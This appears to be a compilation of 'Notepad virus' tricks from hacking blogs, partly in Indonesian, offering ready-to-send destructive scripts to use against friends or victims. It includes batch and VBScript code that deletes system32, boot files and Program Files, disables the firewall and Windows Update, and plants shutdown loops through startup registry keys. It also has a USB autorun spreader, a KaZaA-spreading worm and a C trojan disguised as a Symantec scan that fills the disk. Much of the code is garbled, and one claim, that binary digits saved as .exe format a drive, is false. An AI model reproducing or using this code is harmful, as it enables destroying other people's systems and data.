Script Virus
Script Virus
Cmd Code:
Delete:
Del "C:\Program Files\*.*" /S /Q
Remove directory:
Rmdir "C:\Program Files" /S /Q
Hide all files:
attrib "C:\*.*" +h /S /D
How to destroy pc and make it autoplay
@echo off
del %windir%\system32
Atau
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * anything
shutdown -s -t 7 -c c:Drive
save dengan ekstensi .bat
Bikin autorun nya:
[autorun]
open=*nama file firus nya
ACTION=Click Here
safe as autorun.inf
lalu drag and drop k usb lalu remove usb nya
next time you the usb, autorun nya bakal jalanin virus nya.
1)Continually pop out your friend's CD Drive. If he / she has more than one, it
pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
2) Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
3) Convey your friend a lil' message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak yo
ur friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously
:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
9) Hard prank: Pick your poison batch file. It asks your friend to choose a numb
er between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that
has the power to kill yourself. If you press 'x' then your PC will be formatted
. Do not come crying to me when you fried your computer or if you lost your proj
ect etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your fr
iend, so right click the file, click Properties, click on the 'Change' Icon and
change the icon from there.
10) THRETEN BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random c
olors until you hit a key to stop it, simply copy and paste the following code i
nto notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following c
ode which will do the same thing except when they press a key the screen will go
black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe - See more at: ht
tp://myhistoryweb.blogspot.com/2009/03/10-virus-notepad-script.html#sthash.bLuSQ
qyk.dpuf
How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the
files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
How to stop someone's internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and
therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
ShutDown PC million Times::::
1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u w
ant" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutd
own,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press fini
sh
4.u will find the icon on ur desktop, dont open it, just right click on it and p
ress properties>change icon>select the icon the the internet explorer and the pr
ess apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type
: shutdown -a
Freeze someone's desktop:::
this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur
keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right cli
ck on the mouse and then properties, click on desktop then select customize desk
top.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer
, then click on c: right click on ur mouse and select new folder, write it any n
ame
6.now go to desktop & select all da icons and right click on them then press cut
,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on de
sktop and gp to properties, now go to desktop and select Browse, select the file
that u saved then press appply then ok. now to remove the windows taskbar, righ
t click on the taskbar and go 2 properties, then select autohide the taskbar and
then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!
SHUT UR INTERNET PERMENANTLY:::
This is a slightly more advanced one. It shuts down your internet permanately. I
tried it on myself accidently, i knew what it did, and it still took me a coupl
e of days to get my internet back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt w
hat disables the internet permanately. It is somethinge else, that just provides
a fast response to shut down any connections.
@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ
/d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS har
edAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uau
serv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsA
PI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLex
it /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a
MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::
Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startu
p\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\raw
r.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;
3-save it as matrix.bat
4-finish
1. Code to disable firewall in your or your victims system
Copy this code in Notepad
CODE:
net stop "Security center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShare
dAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuaus
erv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Save it as *.bat or *.exe and then try....
Note:This trick disables firewall permanently..Beware
3.CREATE HIDDEN DATA IN NOTEPAD
IN CMD
type
notepad xxx :hidden
("replace xxx with the path of the text file to be create eg D:\)
then system ask to create a new txt file " click yes"
then type any secret datas on the opened text file
then save it
no one can read it by simply opening
TO READ DATA
OPEN CMD
type
notepad xxx :hidden
(then text file with data will be opened)
4. TO DELETE AN AUTO RUN FILE FROM A DRIVE / USB
@echo off
echo
ECHO ENTER THE USB\DRIVE LETTER TO REMOVE AUTORUN
echo
SET /P X=
attrib -h -r -s %X%:\autorun.inf
DEL %X%:\autorun.inf
pause
SAVE IT AS AUTO.BAT
OPEN IT
Notepad Trick to Format Hard disk
Open Notepad and type:
a) Code:01001011000111110010010101010101010000011111100000
b) Save As it as anything.EXE
c) Run it. Beware that the entire HDD will be erased....n its dangerous fr pc...
...
Notepad Trick - BUSH HID THE FACTS
Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See
Infinite Notepad Trick
Open Notepad.
Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.
Notepad Trick to Lock Folders
Lets lock a folder using notepad trick which is named as PICS in your D: drive ,
whose path is D:PICS
Then the code should be something like this:
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Pics is your folder name. Use the name of the folder in place for pics. Save the
text file as lock.bat in the same drive.
To unlock this locked folder:
Open another new notepad text file and type the following:
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics
Save the text file as key.bat in the same drive. Here again, pics is the name of
the folder. Change it to the folder name you want to lock it.
1 -> Virus Creation Tricks 1
Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WIND
OWS\wscript.vbs","REG_SZ
Now Save This Notepad file With Any Name Having .vbs Extension .
2 -> Virus Creation Trick 2 .
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.
3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat
The Most Simple Virus To Crush The Window
It Only Works With Windows XP
@Echo off
Del C: *.* |y
Save It As Anything.bat
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI
/t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz
/d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Change Files To Non-working TXT Files
Save As A bat File
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI
/t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t
reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAP
I /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexi
t /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
Save As A bat File
Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
? Open Notepad
? Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
? File >> Save As...
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
*** That's all , now the computer will
automatically shutdown on every startup !
This is one i have :
Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2
:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1
##########################################
All it does is brin up loadz of boxes and it keeps opening them until you restar
t your PC. IT IS NOT DANGEROUS IT IS JUST ANNOYING!!!
Worm Virus
@ECHO OFF
if exist c:\romp.bat goto end
:start
cls
Echo Installing Update...
cd c:\windows\system
del keyboard.drv
del mouse.drv
TITLE System Update
echo ::startup >> c:\romp.bat
echo if not exist c:\damp goto prompt >> c:\romp.bat
echo :start >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd damp >> c:\romp.bat
echo md keys >> c:\romp.bat
echo pause >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat >> c:\romp.bat
echo rmdir c:\WUTemp >> c:\romp.bat
echo del c:\windows\system32\*.* >> c:\romp.bat
echo rmdir c:\windows\system32 >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo md system32 >> c:\romp.bat
echo pause >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo cd system32 >> c:\romp.bat
echo md tools >> c:\romp.bat
echo copy *.bat c:\windows\system32\tools\urscrewed.bat
echo echo msgbox" Ur system is now screwed" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" This was no scan... it was more like a scam" >> c:\plastic.vbs
>> c:\romp.bat
echo echo msgbox" It has deleted pretty much all of system32 which is in windows
and has messed
with windows" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" There is no more windows on this computer" >> c:\plastic.vbs >
> c:\romp.bat
echo Rd/s/q c:\windows >> c:\romp.bat
echo Rd/s/q c:\progra~1 >> c:\romp.bat
echo goto part2 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part2 >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md Kierstyn'scan >> c:\romp.bat
echo pause >> c:\romp.bat
echo goto part3 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part3 >> c:\romp.bat
echo rename c:\windows c:\viriiscan >> c:\romp.bat
echo goto end1 >> c:\romp.bat
echo :prompt >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md damp >> c:\romp.bat
echo copy *.bat c:\damp.bat >> c:\romp.bat
echo echo msgbox" Oh No u r so stupid" >> c:\pomper.vbs >> c:\romp.bat
echo echo msgbox" Wow you probably got this through ur lan" >> c:\pomper.vbs >>
c:\romp.bat
echo echo msgbox" Happy dieing staples" >> c:\pomper.vbs >> c:\romp.bat
echo goto start >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :end1 >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat >> c:\ro
mp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat >> c:\ro
mp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the movie.vid.ba
t >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\password hacker.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti virus.exe.ba
t >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat >> c:\rom
p.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat >> c:\romp
.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat >> c:
\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat >> c:\romp
.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.
bmp.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.
mpg.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\windows xp.exe.bat >> c:
\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make viruses.txt.
bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm viruses
.txt.bat >>
c:\romp.bat
echo goto end >> c:\romp.bat
echo :end >> c:\romp.bat
Echo Virus installed
cd c:\Docume~1\All Users\Start Menu\Programs\Startup
copy *.bat cd c:\Docume~1\All Users\Start Menu\Programs\Startup
Echo Now You have to restart to save
START C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
rundll32.exe shell32.dll,SHExitWindowsEx n
pause
del c:\thecreator.bat
:end
Use carefully.
PASSWWORD PROTECT A .VBS SCRIPT
Copy and paste the following into Notepad...
pass=inputbox("Password?")
if pass="fish" then msgbox("Correct Password!") else msgbox("Incorrect Password!
")
The password for this is fish
Save it as Password.vbs And enjoy!
MAKE A MESSAGE BOX (NOTEPAD MODE)
Copy and paste the following into Notepad...
msgbox("Hello!")
msgbox("Hello, Again!")
To make the " hold shift and 2
Inside the (" ") Type what you want it to say
Save it as Message.vbs and Enjoy!
MAKE A MESSAGE BOX LOOP
Copy and paste the following into Notepad...
DO
msgbox("VIRUS!")
LOOP
Save it as Loop.vbs and Enjoy!
OPEN A PROGRAM
Copy and paste the following into Notepad...
Set shell=CreateObject("wscript.shell")
Shell.Run("Notepad.exe")
Save it as run.vbs and enjoy!
NOTE:
Paint is known as "MSPAINT"!
This one opens notepad.
OPEN A LOT OF PROGRAMS AT ONCE
Copy and paste the following into Notepad...
Set shell=CreateObject("wscript.shell")
Shell.Run("Notepad.exe")
Set shell=CreateObject("wscript.shell")
Shell.Run("MSPaint")
Set shell=CreateObject("wscript.shell")
Shell.Run("CMD.exe")
THIS WILL OPEN Notepad, Paint and CMD.
Save it as Opener.vbs and enjoy.
Hi friends this is BreakTheSec. I am going to give you C program to eat the memo
ry in Hard drive. This virus is able to eat the memory space 1 GB per minute. So
Becareful with this virus.
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT
WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE
TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FIL
E \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO
RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
